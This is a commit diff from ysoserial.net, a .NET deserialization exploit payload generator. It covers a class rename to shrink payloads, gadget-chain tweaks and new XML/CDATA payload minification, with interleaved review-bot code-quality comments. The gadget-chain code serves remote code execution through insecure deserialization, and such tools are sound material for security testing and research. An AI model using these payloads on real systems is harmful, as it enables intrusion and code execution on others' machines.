new features and bug fixing
Soroush Dalili committed Feb 5, 2020
1 parent 86b9cac commit 099af77
Showing 27 changed files with 216 additions and 83 deletions.
8 changes: 4 additions & 4 deletions ysoserial/App.config
@@ -1,13 +1,13 @@
<?xml version="1.0" encoding="utf-8"?>
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.6.1" />
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.1"/>
</startup>
<runtime>
<assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
<dependentAssembly>
<assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />
<bindingRedirect oldVersion="0.0.0.0-10.0.0.0" newVersion="10.0.0.0" />
<assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral"/>
<bindingRedirect oldVersion="0.0.0.0-10.0.0.0" newVersion="10.0.0.0"/>
</dependentAssembly>
</assemblyBinding>
</runtime>
23 changes: 9 additions & 14 deletions ysoserial/ExploitClass.cs
@@ -1,14 +1,10 @@
using System;
using System.Windows.Forms;

namespace ysoserial
{
class ExploitClass
 // ExploitClass was renamed to E to reduce the size a little bit
class E
{
public ExploitClass()
public E()
{
try
{
//try
//{
/* Payload code to be executed. Examples: */


Expand Down Expand Up @@ -37,10 +33,9 @@ public ExploitClass()
/* Causing a delay */
//System.Threading.Thread.Sleep(10000); // waits for 10 seconds

}
catch (Exception)
{
}
//}
//catch (Exception)
//{
//}
}
}
}
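Review bot: The constructor's try/catch is commented out (`//try`, `//catch (Exception)` across both hunks) rather than removed, so it is now dead text and the behavioural change it implies — an exception thrown by the payload body now escapes the constructor — is undocumented. If propagating is intended, delete the commented lines and say so next to the rename comment, e.g. `// no try/catch here on purpose: payload failures propagate to the caller — TODO confirm`; otherwise restore the handler. `using System.Windows.Forms;` in the first hunk is not used by any visible line, though the hidden middle of the constructor may need it.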
Expand Up @@ -16,6 +16,10 @@ protected PayloadClassFromFile(SerializationInfo info, StreamingContext context)

public PayloadClassFromFile(string file)
{
if(file.StartsWith("cmd /c "))
{
file = file.Substring("cmd /c ".Length);
}
string[] files = file.Split(new[] { ';' }).Select(s => s.Trim()).ToArray();
CodeDomProvider codeDomProvider = CodeDomProvider.CreateProvider("CSharp");
CompilerParameters compilerParameters = new CompilerParameters();
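Review bot: `file.StartsWith("cmd /c ")` on the first added line is a culture-sensitive comparison and only matches that exact lowercase spelling, so `CMD /C ...` or an extra space slips through and is then treated as a semicolon-separated file list. Use an ordinal, case-insensitive check: `if (file.StartsWith("cmd /c ", StringComparison.OrdinalIgnoreCase))`. A comment saying why the prefix is tolerated would help too, e.g. `// tolerate a leading "cmd /c " so the same -c value works here — TODO confirm intent`. The file header for this hunk is not on the page, and the PayloadClassFromFile constructor continues outside it.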
8 changes: 6 additions & 2 deletions ysoserial/Generators/ActivitySurrogateSelectorGenerator.cs
Expand Up @@ -34,7 +34,7 @@ public class PayloadClass : ISerializable
protected byte[] assemblyBytes;
public PayloadClass()
{
this.assemblyBytes = File.ReadAllBytes(typeof(ExploitClass).Assembly.Location);
this.assemblyBytes = File.ReadAllBytes(typeof(E).Assembly.Location);
}

protected PayloadClass(SerializationInfo info, StreamingContext context)
Expand All @@ -61,7 +61,7 @@ public void GetObjectData(SerializationInfo info, StreamingContext context)
IDictionary dict = (IDictionary)Activator.CreateInstance(typeof(int).Assembly.GetType("System.Runtime.Remoting.Channels.AggregateDictionary"), pds);

// DesignerVerb queries a value from an IDictionary when its ToString is called. This results in the linq enumerator being walked.
DesignerVerb verb = new DesignerVerb("XYZ", null);
DesignerVerb verb = new DesignerVerb("", null);
// Need to insert IDictionary using reflection.
typeof(MenuCommand).GetField("properties", BindingFlags.NonPublic | BindingFlags.Instance).SetValue(verb, dict);

Expand All @@ -77,8 +77,12 @@ public void GetObjectData(SerializationInfo info, StreamingContext context)
Hashtable ht = new Hashtable();

// Add two entries to table.
/*
ht.Add(verb, "Hello");
ht.Add("Dummy", "Hello2");
*/
ht.Add(verb, "");
ht.Add("", "");

FieldInfo fi_keys = ht.GetType().GetField("buckets", BindingFlags.NonPublic | BindingFlags.Instance);
Array keys = (Array)fi_keys.GetValue(ht);
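Review bot: The original `ht.Add(verb, "Hello")` / `ht.Add("Dummy", "Hello2")` calls in the third hunk are kept inside a `/* */` block instead of being deleted; version control already preserves them, and the live lines that replace them (`ht.Add(verb, "")`, `ht.Add("", "")`) now carry no comment explaining why empty strings are acceptable. Replace the commented-out block with one line stating the intent, e.g. `// keys and values are empty strings purely to shrink the payload; presumably only the DesignerVerb key matters, since its ToString walks the dictionary (see above) — TODO confirm`. The `"XYZ"` to `""` change on the DesignerVerb text in the second hunk is the same size-only trimming and could share that comment. GetObjectData starts outside the hunk.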
2 changes: 1 addition & 1 deletion ysoserial/Generators/GenericGenerator.cs
Expand Up @@ -102,7 +102,7 @@ public object Serialize(object cmdobj, string formatter, Boolean test, Boolean m
if (minify)
{
stream.Position = 0;
stream = Helpers.XMLMinifier.Minify(stream, new string[] { "mscorlib" }, null, Helpers.FormatterType.NetDataContractXML);
stream = Helpers.XMLMinifier.Minify(stream, new string[] { "mscorlib" }, null, Helpers.FormatterType.NetDataContractXML, true);
}

if (test)
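Review bot: This is the only call on the page that turns on `useCDATA`, and XMLMinifier's new CDATA pass states in its own comment that it assumes the input is not already inside a CDATA section; nothing here records why NetDataContractXML output satisfies that. Add a comment on the changed line, e.g. `// useCDATA: XMLMinifier's CDATA pass assumes the serialized document contains no CDATA sections of its own — TODO confirm for NetDataContractSerializer output`. Serialize continues outside the hunk.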
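--- a/ysoserial/Generators/PSObjectGenerator.cs
+++ b/ysoserial/Generators/PSObjectGenerator.cs
@@ -132,6 +132,7 @@ public override object Generate(string cmd, string formatter, Boolean test, Bool
 if (minify)
 {
 // Could not be tested so it may not work here!
+// also not sure if can use CDATA otherwise we could use the CDATA flag to save more space
 clixml = Helpers.XMLMinifier.Minify(clixml, null, null);
 }
 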
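--- a/ysoserial/Generators/TypeConfuseDelegateGenerator.cs
+++ b/ysoserial/Generators/TypeConfuseDelegateGenerator.cs
@@ -56,6 +56,10 @@ public object TypeConfuseDelegateGadget(string cmd)
 {
 set.Add(splittedCMD[1]);
 }
+else
+{
+set.Add(""); // this is needed (as it accepts two args?)
+}
 
 FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList", BindingFlags.NonPublic | BindingFlags.Instance);
 object[] invoke_list = d.GetInvocationList();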
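Review bot: The comment on the new `else` branch, `// this is needed (as it accepts two args?)`, records a guess rather than a reason, so the next reader cannot tell whether the empty second element is a requirement of the gadget or a workaround. Confirm the reason and state it, or mark it explicitly: `// TODO(review): confirm why a second, empty entry is required when the command has no argument`. The identical branch and comment are added in TypeConfuseDelegateMonoGenerator.cs. TypeConfuseDelegateGadget starts outside the hunk.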
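--- a/ysoserial/Generators/TypeConfuseDelegateMonoGenerator.cs
+++ b/ysoserial/Generators/TypeConfuseDelegateMonoGenerator.cs
@@ -56,6 +56,10 @@ public object TypeConfuseDelegateGadget(string cmd)
 {
 set.Add(splittedCMD[1]);
 }
+else
+{
+set.Add(""); // this is needed (as it accepts two args?)
+}
 
 FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList", BindingFlags.NonPublic | BindingFlags.Instance);
 object[] invoke_list = d.GetInvocationList();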
2 changes: 1 addition & 1 deletion ysoserial/Generators/WindowsClaimsIdentityGenerator.cs
Expand Up @@ -183,7 +183,7 @@ public override object Generate(string cmd, string formatter, Boolean test, Bool

if (minify)
{
payload = XMLMinifier.Minify(payload, new string[] { "Microsoft.IdentityModel" }, null);
payload = XMLMinifier.Minify(payload, new string[] { "Microsoft.IdentityModel" }, null, Helpers.FormatterType.SoapFormatter);
}

if (test)
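Review bot: The `Helpers.FormatterType.SoapFormatter` argument added here is silently discarded: in this commit's XMLMinifier.cs the four-argument `String` overload of `Minify` forwards `FormatterType.None` instead of `formatterType` (its sibling `Stream` overload has the same slip), so this call minifies exactly as the old three-argument call did. The same applies to the identical change in WindowsIdentityGenerator.cs. The fix belongs in XMLMinifier.cs, one line in each wrapper: `return Minify(xmlDocument, looseAssemblyNames, finalDiscardableRegExStringArray, formatterType, false);` and `return Minify(xmlDocumentStream, looseAssemblyNames, finalDiscardableRegExStringArray, formatterType, false);`. Generate continues outside the hunk.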
2 changes: 1 addition & 1 deletion ysoserial/Generators/WindowsIdentityGenerator.cs
Expand Up @@ -174,7 +174,7 @@ public override object Generate(string cmd, string formatter, Boolean test, Bool
";
if (minify)
{
payload = Helpers.XMLMinifier.Minify(payload, new string[] { "mscorlib" }, null);
payload = Helpers.XMLMinifier.Minify(payload, new string[] { "mscorlib" }, null, Helpers.FormatterType.SoapFormatter);
}

if (test)
6 changes: 1 addition & 5 deletions ysoserial/Helpers/BFMinifier.cs
@@ -1,8 +1,4 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;


namespace ysoserial.Helpers
{
5 changes: 1 addition & 4 deletions ysoserial/Helpers/CommandArgSplitter.cs
@@ -1,10 +1,7 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Xml;

// Coded by Soroush Dalili (@irsdl)
namespace ysoserial.Helpers
{
class CommandArgSplitter
11 changes: 2 additions & 9 deletions ysoserial/Helpers/DevTest/SerializersHelper.cs
@@ -1,25 +1,18 @@
using Microsoft.VisualStudio.Text.Formatting;
using System;
using System.Collections;
using System.Collections.Generic;
using System;
using System.Collections.Specialized;
using System.ComponentModel.Design;
using System.Data;
using System.Diagnostics;
using System.Globalization;
using System.IO;
using System.Linq;
using System.Reflection;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Formatters.Binary;
using System.Text;
using System.Web.UI.WebControls;
using System.Windows;
using System.Windows.Data;
using System.Windows.Markup;
using System.Xml;
using System.Xml.Serialization;

// Coded by Soroush Dalili (@irsdl)
namespace ysoserial.Helpers.DevTest
{
class SerializersHelper
11 changes: 4 additions & 7 deletions ysoserial/Helpers/JSONMinifier.cs
@@ -1,12 +1,9 @@
using Newtonsoft.Json;
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading.Tasks;

// Coded by Soroush Dalili (@irsdl)
namespace ysoserial.Helpers
{
class JSONMinifier
Expand All @@ -31,8 +28,6 @@ private static String JSONDirtyMatchReplaceMinifier(String jsonString, String[]
// replacing spaces between things like:
// Microsoft.IdentityModel, Version=3.5.0.0, PublicKeyToken=31bf3856ad364e35
// clr-namespace:System.Diagnostics; assembly=system
//jsonString = Regex.Replace(jsonString, @"[""'](\s*[^,;""']+\s*[,;]\s*)+([^,;""']+\s*)[""']", delegate (Match m) { return m.Value.Replace(" ", ""); });

jsonString = Regex.Replace(jsonString, @"([a-zA-Z0-9\.\-\:=_\s]+[;,]\s*)+([a-zA-Z0-9\.\-\:=_\s]+)[""'\]\<]", delegate (Match m) {
// we do not want to remove spaces when two alphanumeric strings are next to each other
String finalVal = m.Value;
Expand All @@ -42,8 +37,10 @@ private static String JSONDirtyMatchReplaceMinifier(String jsonString, String[]
return finalVal;
});

// replacing not strong (loose) assembly names
// TODO: We are not replacing true with 1 and false with 0 at the moment due to the fact that none of the payloads in here has it
// This needs to be implemented in the future if we have such JSON objects in the future

// replacing not strong (loose) assembly names
if (LooseAssemblyNames != null)
{
foreach (String asmName in LooseAssemblyNames)
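Review bot: The new TODO in the second hunk proposes replacing `true`/`false` with `1`/`0`; for JSON that is a type change rather than a minification, and whether the consuming deserializer coerces numbers to booleans is parser-specific, so the comment should record that constraint before anyone implements it, e.g. `// NOTE: true->1 / false->0 is only safe when the target deserializer coerces numbers to booleans; verify per formatter before implementing`. JSONDirtyMatchReplaceMinifier starts outside the hunk.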
54 changes: 46 additions & 8 deletions ysoserial/Helpers/XMLMinifier.cs
Expand Up @@ -4,7 +4,6 @@
using System.Linq;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading.Tasks;
using System.Xml;
using System.Xml.Xsl;

Expand Down Expand Up @@ -33,20 +32,30 @@ public static MemoryStream Minify(Stream xmlDocumentStream, String[] looseAssemb
}

public static MemoryStream Minify(Stream xmlDocumentStream, String[] looseAssemblyNames, String[] finalDiscardableRegExStringArray, FormatterType formatterType)
{
return Minify(xmlDocumentStream, looseAssemblyNames, finalDiscardableRegExStringArray, FormatterType.None, false);
}

public static MemoryStream Minify(Stream xmlDocumentStream, String[] looseAssemblyNames, String[] finalDiscardableRegExStringArray, FormatterType formatterType, Boolean useCDATA)
{
StreamReader reader = new StreamReader(xmlDocumentStream);
string xmlDocument = reader.ReadToEnd();
xmlDocument = Minify(xmlDocument, looseAssemblyNames, finalDiscardableRegExStringArray, formatterType);
xmlDocument = Minify(xmlDocument, looseAssemblyNames, finalDiscardableRegExStringArray, formatterType, useCDATA);
byte[] byteArray = Encoding.UTF8.GetBytes(xmlDocument);
return new MemoryStream(byteArray);
}

public static String Minify(String xmlDocument, String[] looseAssemblyNames, String[] finalDiscardableRegExStringArray)
{
return Minify(xmlDocument, looseAssemblyNames, finalDiscardableRegExStringArray, FormatterType.None);
return Minify(xmlDocument, looseAssemblyNames, finalDiscardableRegExStringArray, FormatterType.None, false);
}

public static String Minify(String xmlDocument, String[] looseAssemblyNames, String[] finalDiscardableRegExStringArray, FormatterType formatterType)
{
return Minify(xmlDocument, looseAssemblyNames, finalDiscardableRegExStringArray, FormatterType.None, false);
}

public static String Minify(String xmlDocument, String[] looseAssemblyNames, String[] finalDiscardableRegExStringArray, FormatterType formatterType, Boolean useCDATA)
{
xmlDocument = XmlParserNamespaceMinifier(xmlDocument);

Expand All @@ -63,7 +72,7 @@ public static String Minify(String xmlDocument, String[] looseAssemblyNames, Str
}

xmlDocument = XmlXSLTMinifier(xmlDocument);
xmlDocument = XmlDirtyMatchReplaceMinifier(xmlDocument, looseAssemblyNames, finalDiscardableRegExStringArray);
xmlDocument = XmlDirtyMatchReplaceMinifier(xmlDocument, looseAssemblyNames, finalDiscardableRegExStringArray, useCDATA);

return xmlDocument;
}
Expand Down Expand Up @@ -167,7 +176,7 @@ private static String ReplaceNamespaceNameAndValue(String xmlDocument, String Ol
}


private static String XmlDirtyMatchReplaceMinifier(String xmlDocument, String[] looseAssemblyNames, String[] finalDiscardableRegExStringArray)
private static String XmlDirtyMatchReplaceMinifier(String xmlDocument, String[] looseAssemblyNames, String[] finalDiscardableRegExStringArray, Boolean useCDATA)
{
// replacing spaces before > or /> in valid elements
xmlDocument = Regex.Replace(xmlDocument, @"(\<\/?[\w\:_]+([\s/]+[a-zA-Z0-9\.\-\:=_]+\s*=\s*(""[^""]*""|'[^']*'))*)\s+(\/?>)", "$1$+");
Expand All @@ -181,9 +190,6 @@ private static String XmlDirtyMatchReplaceMinifier(String xmlDocument, String[]
// clr-namespace:System.Diagnostics; assembly=system
// { x:Type Diag:Process }
// Int32 Compare(System.String, System.String)

//xmlDocument = Regex.Replace(xmlDocument, @"[""'](\s*[^&,;""'<]+\s*[,;]\s*)+([^&,;""'<]+\s*)[""']", delegate (Match m) { return m.Value.Replace(" ", ""); });

xmlDocument = Regex.Replace(xmlDocument, @"([a-zA-Z0-9\.\-\:=_\s]+[;,]\s*)+([a-zA-Z0-9\.\-\:=_\s]+)[""'\]\<]", delegate (Match m) {
// we do not want to remove spaces when two alphanumeric strings are next to each other
String finalVal = m.Value;
Expand Down Expand Up @@ -217,6 +223,38 @@ private static String XmlDirtyMatchReplaceMinifier(String xmlDocument, String[]
}
}

if (useCDATA)
{
// at this point, we want to decode all HTML encodings of valid XML elements and use CDATA
// we assume we are not already in CDATA! (big assumption)
// if we really want to save space, we need to have around 4 encoded values but we also ignore that for now

string htmlEncodedPattern = @"(?<=>\s*)(\&lt;([\w\:_\-]+)[^<]+)(?=\s*<)";
Regex htmlEncodedRegEx = new Regex(htmlEncodedPattern, RegexOptions.Compiled);
MatchCollection htmlEncodedMatches = htmlEncodedRegEx.Matches(xmlDocument);

foreach (Match match in htmlEncodedMatches)
{
GroupCollection groups = match.Groups;
String htmlEncodedValue = groups[1].Value;
String newValue = System.Web.HttpUtility.HtmlDecode(htmlEncodedValue);

// now we can also minify this probably
try
{
newValue = Minify(newValue, null, null);
}
catch (Exception e)
{
//
}

xmlDocument = xmlDocument.Replace(htmlEncodedValue, "<![CDATA[" + newValue + "]]>");

}

}

return xmlDocument;
}
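Review bot: The CDATA pass in the last hunk rewrites the document with `xmlDocument.Replace(htmlEncodedValue, ...)`, which is unanchored: because the pattern's `[^<]+` tail is greedy, an encoded fragment that is a prefix of a longer one (say `&lt;a&gt;x` followed by `<` and `&lt;a&gt;xy` elsewhere) rewrites the inside of the longer fragment on the first iteration and leaves it half-wrapped. The decoded text is also never checked for `]]>`, which ends a CDATA section early and yields malformed XML, and `catch (Exception e)` around the nested `Minify` swallows every failure with an unused variable. The rewrite below replaces each match in place through `Regex.Replace` with an evaluator, keeps the decoded-but-unminified value when the nested minify throws, and leaves fragments containing `]]>` encoded. XmlDirtyMatchReplaceMinifier starts outside the hunk.
```csharp
if (useCDATA)
{
    // … unchanged: comments and htmlEncodedPattern …
    Regex htmlEncodedRegEx = new Regex(htmlEncodedPattern, RegexOptions.Compiled);

    // replace each match in place so one fragment can never rewrite the inside of another
    xmlDocument = htmlEncodedRegEx.Replace(xmlDocument, delegate (Match match)
    {
        String htmlEncodedValue = match.Groups[1].Value;
        String newValue = System.Web.HttpUtility.HtmlDecode(htmlEncodedValue);

        try
        {
            newValue = Minify(newValue, null, null);
        }
        catch (Exception)
        {
            // nested minify failed: keep the decoded but unminified value
        }

        // "]]>" would terminate the CDATA section early, so leave such fragments encoded
        if (newValue.Contains("]]>"))
        {
            return match.Value;
        }

        return "<![CDATA[" + newValue + "]]>";
    });
}
```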

5 changes: 1 addition & 4 deletions ysoserial/Helpers/YamlDotNet.cs
@@ -1,10 +1,7 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading.Tasks;

// Coded by Soroush Dalili (@irsdl)
namespace ysoserial.Helpers
{
class YamlDotNet
2 changes: 1 addition & 1 deletion ysoserial/Plugins/AltserializationPlugin.cs
Expand Up @@ -32,7 +32,7 @@ class AltserializationPlugin : Plugin
{"o|output=", "the output format (raw|base64).", v => format = v },
{"c|command=", "the command to be executed", v => command = v },
{"t|test", "whether to run payload locally. Default: false", v => test = v != null },
{"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify = v != null },
//{"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify = v != null },
};

public string Name()
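Review bot: The `minify` option is commented out rather than removed, which leaves a dead line in the option table and, if the `minify` local and its `if (minify)` branch still exist elsewhere in the file (not visible here), an option nobody can set. Either delete the line together with the variable, or keep a one-line explanation in its place, e.g. `// "minify" intentionally not offered: this plugin's output is not handled by the XML/JSON minifiers — TODO confirm`. ClipboardPlugin.cs gets the identical change. The option table's class continues outside the hunk.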
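--- a/ysoserial/Plugins/ApplicationTrustPlugin.cs
+++ b/ysoserial/Plugins/ApplicationTrustPlugin.cs
@@ -89,6 +89,11 @@ public object Run(string[] args)
 payloadValue = BitConverter.ToString(osf).Replace("-", string.Empty);
 payload = String.Format(payload, payloadValue);
 
+if (minify)
+{
+payload = Helpers.XMLMinifier.Minify(payload, null, null);
+}
+
 if (test)
 {
 // PoC on how it works in practice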
2 changes: 1 addition & 1 deletion ysoserial/Plugins/ClipboardPlugin.cs
Expand Up @@ -34,7 +34,7 @@ class ClipboardPlugin : Plugin
{"F|format=", "the object format: Csv, DeviceIndependentBitmap, DataInterchangeFormat, PenData, RiffAudio, WindowsForms10PersistentObject, System.String, SymbolicLink, TaggedImageFileFormat, WaveAudio. Default: System.String", v => format = v },
{"c|command=", "the command to be executed", v => command = v },
{"t|test", "whether to run payload locally. Default: false", v => test = v != null },
{"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify = v != null },
//{"minify", "Whether to minify the payloads where applicable (experimental). Default: false", v => minify = v != null },
};

public string Name()
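--- a/ysoserial/Plugins/DotNetNukePlugin.cs
+++ b/ysoserial/Plugins/DotNetNukePlugin.cs
@@ -82,6 +82,12 @@ public object Run(string[] args)
 Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
 System.Environment.Exit(-1);
 }
+
+if (minify)
+{
+payload = Helpers.XMLMinifier.Minify(payload, null, null);
+}
+
 return payload;
 
 }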

0 comments on commit 099af77

Please sign in to comment.